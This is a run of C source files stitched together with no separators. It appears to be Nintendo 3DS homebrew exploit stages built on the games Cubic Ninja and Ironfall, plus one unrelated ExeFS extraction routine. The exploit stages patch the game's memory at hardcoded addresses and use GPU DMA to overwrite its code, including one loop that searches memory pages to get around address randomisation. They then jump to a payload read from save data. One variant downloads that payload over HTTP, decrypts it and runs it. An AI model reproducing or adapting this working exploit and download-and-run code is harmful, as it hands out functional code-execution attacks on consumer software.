void _main()
{
Handle fileHandle = 0x0;
Result ret = 0x0;
u32 compressed_size = 0x0;
u8* compressed_buffer = LINEAR_BUFFER;
// load payload.bin from savegame
ret = _FSUSER_OpenFileDirectly(fsHandle, &fileHandle, 0x0, 0x00000004, PATH_EMPTY, "", 1, PATH_CHAR, "/payload.bin", 13, 0x1, 0x0);
if(ret)*(u32*)ret = 0xdead0001;
ret = _FSUSER_ReadFile(&fileHandle, &compressed_size, 0x0, compressed_buffer, 0xA000);
if(ret)*(u32*)ret = 0xdead0002;
u8* decompressed_buffer = &compressed_buffer[(compressed_size + 0xfff) & ~0xfff];
u32 decompressed_size = lzss_get_decompressed_size(compressed_buffer, compressed_size);
// decompress payload
ret = lzss_decompress(compressed_buffer, compressed_size, decompressed_buffer, decompressed_size);
// copy payload to text
ret = _GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)decompressed_buffer, decompressed_size);
ret = gspwn((void*)(IRON_CODE_LINEAR_BASE + 0x00101000 - 0x00100000), decompressed_buffer, (decompressed_size + 0x1f) & ~0x1f);
svc_sleepThread(300*1000*1000);
// ghetto dcache invalidation
// don't judge me
int i, j;//, k;
// for(k=0; k<0x2; k++)
for(j=0; j<0x4; j++)
for(i=0; i<0x01000000/0x4; i+=0x4)
LINEAR_BUFFER[i+j]^=0xDEADBABE;
// put framebuffers in linear mem so they're writable
u8* top_framebuffer = &LINEAR_BUFFER[0x00100000];
u8* low_framebuffer = &top_framebuffer[0x00046500];
_GSPGPU_SetBufferSwap(*gspHandle, 0, (GSP_FramebufferInfo){0, (u32*)top_framebuffer, (u32*)top_framebuffer, 240 * 3, (1<<8)|(1<<6)|1, 0, 0});
_GSPGPU_SetBufferSwap(*gspHandle, 1, (GSP_FramebufferInfo){0, (u32*)low_framebuffer, (u32*)low_framebuffer, 240 * 3, 1, 0, 0});
// un-init DSP so killing Ironfall will work
_DSP_UnloadComponent(dspHandle);
_DSP_RegisterInterruptEvents(dspHandle, 0x0, 0x2, 0x2);
// run payload
{
void (*payload)(u32* paramlk, u32* stack_pointer) = (void*)0x00101000;
u32* paramblk = (u32*)LINEAR_BUFFER;
paramblk[0x1c >> 2] = IRON_GSPGPU_GXCMD4;
paramblk[0x20 >> 2] = IRON_GSPGPU_FLUSHDATACACHE_WRAPPER;
paramblk[0x48 >> 2] = 0x8d; // flags
paramblk[0x58 >> 2] = IRON_GSPGPU_HANDLE;
paramblk[0x64 >> 2] = 0x08010000;
payload(paramblk, (u32*)(0x10000000 - 4));
}
*(u32*)ret = 0xdead0008;
}
void exefs_save(exefs_context* ctx, u32 index, u32 flags)
{
exefs_sectionheader* section = (exefs_sectionheader*)(ctx->header.section + index);
char outfname[MAX_PATH];
char name[64];
u32 offset;
u32 size;
FILE* fout;
u32 compressedsize = 0;
u32 decompressedsize = 0;
u8* compressedbuffer = 0;
u8* decompressedbuffer = 0;
filepath* dirpath = 0;
offset = getle32(section->offset) + sizeof(exefs_header);
size = getle32(section->size);
dirpath = settings_get_exefs_dir_path(ctx->usersettings);
if (size == 0 || dirpath == 0 || dirpath->valid == 0)
return;
if (size >= ctx->size)
{
fprintf(stderr, "Error, ExeFS section %d size invalid\n", index);
return;
}
memset(name, 0, sizeof(name));
memcpy(name, section->name, 8);
memcpy(outfname, dirpath->pathname, MAX_PATH);
strcat(outfname, "/");
if (name[0] == '.')
strcat(outfname, name+1);
else
strcat(outfname, name);
strcat(outfname, ".bin");
fout = fopen(outfname, "wb");
if (fout == 0)
{
fprintf(stderr, "Error, failed to create file %s\n", outfname);
goto clean;
}
fseek(ctx->file, ctx->offset + offset, SEEK_SET);
ctr_init_counter(&ctx->aes, ctx->key, ctx->counter);
ctr_add_counter(&ctx->aes, offset / 0x10);
if (index == 0 && (ctx->compressedflag || (flags & CompressCodeFlag)) && ((flags & RawFlag) == 0))
{
fprintf(stdout, "Decompressing section %s to %s...\n", name, outfname);
compressedsize = size;
compressedbuffer = malloc(compressedsize);
if (compressedbuffer == 0)
{
fprintf(stdout, "Error allocating memory\n");
goto clean;
}
if (compressedsize != fread(compressedbuffer, 1, compressedsize, ctx->file))
{
fprintf(stdout, "Error reading input file\n");
goto clean;
}
if (ctx->encrypted)
ctr_crypt_counter(&ctx->aes, compressedbuffer, compressedbuffer, compressedsize);
decompressedsize = lzss_get_decompressed_size(compressedbuffer, compressedsize);
decompressedbuffer = malloc(decompressedsize);
if (decompressedbuffer == 0)
{
fprintf(stdout, "Error allocating memory\n");
goto clean;
}
if (0 == lzss_decompress(compressedbuffer, compressedsize, decompressedbuffer, decompressedsize))
goto clean;
if (decompressedsize != fwrite(decompressedbuffer, 1, decompressedsize, fout))
{
fprintf(stdout, "Error writing output file\n");
goto clean;
}
}
else
{
u8 buffer[16 * 1024];
fprintf(stdout, "Saving section %s to %s...\n", name, outfname);
while(size)
{
u32 max = sizeof(buffer);
if (max > size)
max = size;
if (max != fread(buffer, 1, max, ctx->file))
{
fprintf(stdout, "Error reading input file\n");
goto clean;
}
if (ctx->encrypted)
ctr_crypt_counter(&ctx->aes, buffer, buffer, max);
if (max != fwrite(buffer, 1, max, fout))
{
fprintf(stdout, "Error writing output file\n");
goto clean;
}
size -= max;
}
}
clean:
free(compressedbuffer);
free(decompressedbuffer);
return;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
svc_signalEvent(((Handle*)0x3480d0)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// //close thread handles
// ret=svc_closeHandle(*((Handle*)0x359938));
// ret=svc_closeHandle(*((Handle*)0x34FEA4));
// ret=svc_closeHandle(*((Handle*)0x356274));
// ret=svc_closeHandle(*((Handle*)0x334730));
// ret=svc_closeHandle(*((Handle*)0x334F64));
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
paintScreen(0x00,0x00,0x00);
// drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0);
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//read secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
// drawString(TOPFBADR1,"ninjhaxx",0,0);
// drawString(TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
svc_sleepThread(0x10000000);
Handle httpcHandle;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
// drawHex(ret,0,line+=10);
// drawHex(httpcHandle,0,line+=10);
Handle httpContextHandle=0x00;
ret=HTTPC_Initialize(httpcHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL OUTNAME ".bin", &httpContextHandle);
// drawHex(ret,0,line+=10);
Handle httpcHandle2;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
// drawHex(ret,0,line+=10);
u8* buffer0=(u8*)0x14100000;
u8* buffer1=(u8*)0x14300000;
u32 secondaryPayloadSize=0x0;
ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
// drawHex(ret,0,line+=10);
HTTPC_CloseContext(httpcHandle2, httpContextHandle);
//TODO : modify key/parray first ?
//(use some of its slots as variables in ROP to confuse people ?)
//decrypt secondary payload
Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
blowfishKeyScheduler((u32*)0x14200000);
blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
while(!*(u32*)(&buffer1[secondaryPayloadSize-4]))secondaryPayloadSize-=4;
lzss_decompress(buffer1, secondaryPayloadSize, buffer0, lzss_get_decompressed_size(buffer1, secondaryPayloadSize));
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer0, 0x300000);
// drawHex(ret,0,line+=10);
doGspwn((u32*)(buffer0), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// drawString(TOPFBADR1,"ninjhax2",100,0);
// drawString(TOPFBADR2,"ninjhax2",100,0);
void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
reset(secondaryPayloadSize);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
#ifdef CN_WEST
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
// patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
// patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
// svc_signalEvent(((Handle*)0x3480d0)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
#else
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
// patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
// patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
// svc_signalEvent(((Handle*)0x354ba8)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
#endif
// everything else is common
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
#ifndef QRINSTALLER
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
#else
memcpy((u8*)0x14100000, (u8*)0x14300000, secondaryPayloadSize);
#endif
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
// doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
// in order to bypass paslr we have to search for individual pages to overwrite...
int i, j;
int k = 0;
for(i = 0; i < CN_CODEBIN_SIZE && k < 0xC; i += 0x1000)
{
for(j = 0; j < 0x0000C000; j += 0x1000)
{
if(!memcmp((void*)(CN_RANDCODEBIN_COPY_BASE + i), (void*)(CN_3DSX_LOADADR + j), 0x20))
{
doGspwn((u32*)(0x14100000 + j), (u32*)(CN_RANDCODEBIN_BASE + i), 0x00001000);
svc_sleepThread(10 * 1000 * 1000);
k++;
break;
}
}
}
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}